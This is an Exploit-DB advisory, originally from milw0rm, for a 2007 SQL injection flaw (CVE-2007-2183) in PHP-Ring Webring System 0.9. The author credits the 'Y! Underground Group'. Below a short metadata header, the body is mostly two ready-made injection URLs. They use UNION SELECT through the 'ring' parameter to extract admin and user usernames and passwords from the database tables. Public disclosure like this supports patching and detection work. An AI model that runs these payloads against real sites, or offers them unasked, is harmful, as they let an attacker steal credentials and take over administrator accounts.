PHP-Ring Webring System 0.9 - Remote SQL Injection Vulnerability

2007-04-22T00:00:00
ID EDB-ID:3774
Type exploitdb
Reporter Dj7xpl
Modified 2007-04-22T00:00:00

Description

PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability. CVE-2007-2183. Webapps exploit for php platform

                                        
                                                                                                 Y! Underground Group
						        http://2600.ir

								
								
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......:   uPHP_ring_website
Download.....:   http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........:   Sql Injection Attack
Author.......:   Dj7xpl / dj7xpl@2600.ir
HomePage.....:   http://Dj7xpl.2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

index.php?ring=Sql.Inject

index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]